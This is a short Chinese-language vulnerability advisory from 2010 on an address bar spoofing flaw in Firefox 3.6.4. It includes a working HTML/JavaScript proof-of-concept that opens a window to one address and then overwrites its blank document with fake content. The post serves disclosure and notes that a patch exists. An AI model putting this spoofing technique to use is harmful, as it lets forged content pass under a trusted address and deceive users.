Mozilla Firefox 3.6.4 address bar欺骗漏洞 POC
- 发表于
- Vulndb
发布时间:2010-06-23
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
问题出在浏览器打开新窗口时,这时的document是 about:blank,但是出于用户体验,浏览器的address bar会写入目标地址,可是 blank的document是可以被当前页面修改的。
POC:
<input type=submit value="Click me!" onclick="clicked()"> <script> var w; function clicked() { w = window.open("http://1.2.3.4/", "_blank", "toolbar=1,menubar=1"); setTimeout('w.document.body.innerHTML = "Fake content!";w.stop();', 500); } </script>
解决方法:
官方已经出了更新,请及时更新!
原文连接:Mozilla Firefox 3.6.4 address bar欺骗漏洞 POC
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。